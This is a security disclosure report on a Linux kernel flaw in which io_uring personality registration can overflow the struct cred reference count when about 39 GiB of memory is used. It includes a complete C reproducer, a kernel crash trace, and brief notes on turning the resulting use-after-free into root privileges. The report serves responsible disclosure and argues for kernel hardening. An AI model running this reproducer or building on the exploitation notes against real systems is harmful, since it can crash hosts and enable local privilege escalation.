Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring (see also my related prior bug reports about overflowing refcounts with lots of RAM usage: https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAM https://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM) Since commit 071698e13ac6 (\"io_uring: allow registering credentials\"), landed in 5.6, it has been possible to grab references to `struct cred` very efficiently - by repeatedly calling the syscall `io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possible to register up to 0xffff refcounted pointers to `struct cred` in an xarray (or in older kernel versions, in an IDR). These pointers can all be pointing to the same `struct cred`. By using a bunch of io_uring instances, that makes it possible to create a lot of refcounted references to `struct cred` at a very efficient and low amortized memory cost of less than 10 bytes per reference. `struct cred` is refcounted using the member `atomic_t usage`, which is a plain signed 32-bit atomic counter with no overflow checking. I believe there is some history here where Elena Reshetova and Kees Cook have been trying to turn it into a `refcount_t`, which would also fix this kind of issue by marking the refcount as \"saturated\" when it reaches 2^31 and then never freeing the object. Most recently there was this thread, where Kees tried to get that change in; there was some discussion, but I don't think anything has landed so far: So by using ~39 GiB of physical memory, it is possible to store 2^32 references to `struct cred` and overflow the reference counter. That's not exactly a small amount of RAM, but I guess a lot of servers probably have that much RAM? At least cloud providers like AWS sell machines with much more RAM than that. I am including as recipients both akpm (who is the maintainer for kernel/cred.c and was involved in the linked discussion) and the io_uring maintainers (though io_uring, in my opinion, isn't really where the core issue here lies, but it happened to make it possible to hit this overflow using a fairly small amount of physical memory). Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested it in a VM so that the host machine could swap a bit): ============ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) // power of 2 #define PARALLELISM 4 static int efd; static void *thread_fn(void *dummy) { for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) { struct io_uring_params params = { .flags = IORING_SETUP_NO_SQARRAY }; int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms)); printf(\"uring_fd = 0x%x\ \", (unsigned int)uring_fd); for (int i=0; i<0xffff; i++, refcount++) SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0)); } printf(\"one thread ready\ \"); eventfd_write(efd, 1); while (1) pause(); } int main(void) { setbuf(stdout, NULL); sync(); struct rlimit rlim; SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim)); if (rlim.rlim_max < 65550) printf(\"WARNING: RLIMIT_NOFILE maximum is probably too low\ \"); rlim.rlim_cur = rlim.rlim_max; SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim)); efd = SYSCHK(eventfd(0, 0)); pthread_t threads[PARALLELISM]; for (int i = 0; i < PARALLELISM; i++) { if (pthread_create(threads+i, NULL, thread_fn, NULL)) errx(1, \"pthread_create\"); } for (int i=0; i<4;) { eventfd_t val; SYSCHK(eventfd_read(efd, &val)); i += val; } printf(\"refs should have wrapped. press ctrl+c for uaf on cleanup.\ \"); while (1) pause(); } ============ The reproducer takes a while to run; when it's done and the cred refcount has been wrapped, you can press ctrl+c to make the process exit, which will repeatedly decrement the cred refcount until the cred refcount reaches zero (when there are actually 2^32 references remaining). At that point, it'll hit the `BUG_ON(cred == current->cred)` check in `__put_cred()`, since the reproducer doesn't go out of its way to avoid this check: ============ kernel BUG at kernel/cred.c:150! invalid opcode: 0000 [#1] PREEMPT SMP CPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:__put_cred+0x55/0x60 Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246 RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94 RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480 RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007 R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040 R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938 FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0 PKRU: 55555554 Call Trace: [...] io_ring_ctx_wait_and_kill+0xa8/0x180 io_uring_release+0x20/0x30 __fput+0x92/0x2c0 task_work_run+0x5a/0x90 do_exit+0x36c/0xbc0 do_group_exit+0x37/0xa0 get_signal+0xbcf/0xbd0 arch_do_signal_or_restart+0x3e/0x270 exit_to_user_mode_prepare+0xba/0x110 syscall_exit_to_user_mode+0x21/0x50 do_syscall_64+0x52/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 RIP: 0033:0x7ff41d547d92 Code: Unable to access opcode bytes at 0x7ff41d547d68. RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022 RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92 RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000 RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040 R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfff R13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000 Modules linked in: ---[ end trace 0000000000000000 ]--- RIP: 0010:__put_cred+0x55/0x60 Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246 RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94 RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480 RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007 R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040 R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938 FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0 PKRU: 55555554 Fixing recursive fault but reboot is needed! ============ A use-after-free of `struct cred` should be exploitable; one method would be to try to get the freed object allocated again as the `struct cred` of a root-privileged process, another method would be to try to reallocate the object with a buffer containing attacker-controlled data somehow (and then fake a full capability set in init_user_ns with UIDs set to zero). While one tempting easy fix here would be to close off avenues for getting lots of references with little RAM (like somehow making io_uring reuse IDs with a local usage counter when userspace tries to insert the same `struct cred` into the xarray multiple times), I think that this example shows how fragile that method is. It requires knowing about all the various reference paths that can hold references to `struct cred`, and what kinds of multipliers or global limits apply at every point in this reference graph. I think the kernel should be using some flavor of saturating refcounts as the default choice, at least on machines that have enough RAM to store 2^32 pointers. If there are specific cases where the overhead is undesirable, I think we should only omit such a check if we can document exactly how many references can exist at most, with enough warning comments scattered around to ensure that the assumptions can't accidentally be broken inadvertently later on. (Or the kernel could limit SLUB to a maximum of 32 GiB of memory except for specially marked slabs that store objects guaranteed to not hold multiple references to the same object, but I think people would probably hate that idea.) (But note that refcount hardening also has value for protecting against bugs where some repeatedly executed codepath forgets to decrement the refcount, letting it drift up until it wraps around; and that kind of bug is also exploitable without using ginormous amounts of RAM.) This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-02-26. Found by: jannh@google.com